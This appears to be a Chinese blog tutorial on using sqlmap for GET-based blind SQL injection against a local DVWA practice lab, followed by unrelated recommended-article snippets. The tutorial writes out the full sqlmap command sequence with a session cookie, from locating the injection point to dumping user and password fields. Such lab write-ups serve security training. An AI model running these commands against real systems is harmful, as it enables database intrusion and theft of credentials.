DVWA—使用sqlmap工具get注入_sqlmap get_一只躺平的猪的博客-程序员宝宝

技术标签: dvwa  前端  


环境工具

使用phpstudy搭建的DVWA靶场SQL盲注
burpsuite
sqlmap


一、下载安装sqlmap

下载安装sqlmap https://javaforall.cn/126449.html

二、攻击步骤

1.修改靶场级别

修改DVWA靶场的安全级别为Low

2.获取cookie

  • 合法输入2,页面正常回显
    在这里插入图片描述
  • 由于需要cookie值,使用burpsuite进行抓包获取cookie
    在这里插入图片描述

3.寻找注入点

python sqlmap.py -u “http://192.168.209.143/dvwa/vulnerabilities/sqli_blind/?id=2&Submit=Submit#” --cookie=“PHPSESSID=qurf60l2alrquvlvk1t7t66kf2; security=low” --batch

在这里插入图片描述
在这里插入图片描述

4.查看数据库信息

python sqlmap.py -u “http://192.168.209.143/dvwa/vulnerabilities/sqli_blind/?id=2&Submit=Submit#” --cookie=“PHPSESSID=qurf60l2alrquvlvk1t7t66kf2; security=low” --batch --dbs

在这里插入图片描述
在这里插入图片描述

5.查看当前数据库名称

python sqlmap.py -u “http://192.168.209.143/dvwa/vulnerabilities/sqli_blind/?id=2&Submit=Submit#” --cookie=“PHPSESSID=qurf60l2alrquvlvk1t7t66kf2; security=low” --batch --current-db

在这里插入图片描述

6.查看数据库中所有的表

python sqlmap.py -u “http://192.168.209.143/dvwa/vulnerabilities/sqli_blind/?id=2&Submit=Submit#” --cookie=“PHPSESSID=qurf60l2alrquvlvk1t7t66kf2; security=low” --batch -D dvwa --tables

在这里插入图片描述

7.查看users表中的字段

python sqlmap.py -u “http://192.168.209.143/dvwa/vulnerabilities/sqli_blind/?id=2&Submit=Submit#” --cookie=“PHPSESSID=qurf60l2alrquvlvk1t7t66kf2; security=low” --batch -D dvwa -T users --columns

在这里插入图片描述
在这里插入图片描述

8.爆破users表中特殊字段的信息

python sqlmap.py -u “http://192.168.209.143/dvwa/vulnerabilities/sqli_blind/?id=2&Submit=Submit#” --cookie=“PHPSESSID=qurf60l2alrquvlvk1t7t66kf2; security=low” --batch -D dvwa -T users -C “user,password” --dump

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述


总结

本章介绍了sqlmap关于get注入的使用步骤以及攻击的相关语句。

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45833260/article/details/125657568

智能推荐

android 获取textview的高度,Android 可直接获取高度的textView_浩浩耗的博客-程序员宝宝

众所周知Android原生的textView在setText()执行之后并不能马上通过getHeight得到当前textView的高度,此时需要使用观察者模式在textView绘制完毕后取得,那么如果需要立即知道此时textView的高度和行数,甚至是要锁定textView的行数并拿到某一行最后一个字符的下标,这时候使用textView就非常的不方便了。如果强行使用观察者模式,在实践中往往需要执行...

OKR测试试卷模板(进阶)-程序员宝宝

此试卷适合参加过培训后的测试,用于检验员工对于OKR的了解程度。满分为100分,测试时间为15-20min,具体题型设置为:填空题、判断题、单选题和多选题。OKR测试试卷模板(进阶)一、填空题(共5道,每题4分,总分20分)OKR是 __________ 的缩写。OKR的目标一般分为两类,一类是与日常工作紧密联系、一定要达成的 _________ ;另一类是突破舒适区、挑战不可能的 _______。OKR最常见的3种时间周期是 ____________ 。OKR回答了两个问题,分别是 ____

清理linux无用的依赖包或软件_linux卸载无用依赖_一指流沙QQ的博客-程序员宝宝

可以使用以下命令清理系统垃圾sudo apt-get autoclean 清理旧版本的软件缓存sudo apt-get clean 清理所有软件缓存sudo apt-get autoremove 删除系统不再使用的孤立软件执行sudo nautilus /boot删除除了最新内核以外的其它文件,(比如2006-08-17 官方内核是 26,那就可以删除所有 ...

指令学习-21-程序员宝宝

1. 获取jar 路径。清理当前文件夹和子文件的。

Scala-包、类、对象、成员、伴生类、伴生对象 访问权限_scala 使用伴生对象创建的类对象不能访问类成员_易悠的博客-程序员宝宝

Scala 包、类、对象、成员 访问权限/** * Created by Administrator on 2015/10/13. */package spark{ package navigation{ private [spark] class Navigator{ protected[navigation] def useStarChart(){}

随便推点

ElasticSearch在java应用简单示例_elasticsearch java实例_键盘上的手艺人-cloudFly的博客-程序员宝宝

添加依赖<dependencies> <dependency> <groupId>org.elasticsearch.client</groupId> <artifactId>transport</artifactId> <version>7.4.2</versi...

[R] venn.diagram保存pdf格式文件?_weixin_30872733的博客-程序员宝宝

vennDiagram包中的主函数绘图时,好像不直接支持PDF格式文件:dat = list(a = group_out[[1]][,1],b = group_out[[2]][,1])names(dat) <- group_names[1:2]venn.plot <- venn.diagram( dat, filename = "proteinGroup_v...

JDBC(与Oracle的连接)_jdbc与oracle_Hustudent20080101的博客-程序员宝宝

JDBC(与Oracle的连接)标签: oraclejdbcnulleclipse数据库import2009-02-23 17:27 61799人阅读 评论(7) 收藏 举报 分类:JAVA笔记(47) 版权声明:本文为博主原创文章,未经博主允许不得转载。JDBC编程步骤:----java与Oracle数据的连接(lomboz

用C语言实现2048小游戏_yantu 12的博客-程序员宝宝

写之前,首先感谢CSDN中以及网上其他的大神,感谢将自己的代码分享出来,解决了前期的很多困难。最近在学习C++的一些基本语法,一直想找个小的项目练一下,后来在网上找到了很多的开源项目,发现2048比较简单也比较容易入门,就选择了做个命令窗口式的2048。总体思路就是设计一个44的数组模型,然后对这个44的数组模型进行移动合并等操作。做这个项目主要就是分为以下几步:第一步:输出合适的20...

PyTorch教程-0:PyTorch的安装_超级超级小天才的博客-程序员宝宝

PyTorch教程-0:PyTorch的安装安装PyTorch安装PyTorch参考如下的页面:https://pytorch.org/get-started/locally/根据自己电脑的系统、安装方式、CUDA版本、PyTorch版本等进行配置选择,然后复制下边的命令到命令行工具执行即可对于CUDA版本,这里介绍Windows系统的查看方式:在桌面右键选择 NVIDIA 控制面板,或者直接搜索“NVIDIA control panel”,再或者在右下角收起的程序中寻找。打开控制面板后选择上

POJ3666_Making the Grade_DP_yuege38的博客-程序员宝宝

Making the GradeTime Limit: 1000MS Memory Limit: 65536KTotal Submissions: 6994 Accepted: 3234DescriptionA straight dirt road connects two fields on FJ's farm, b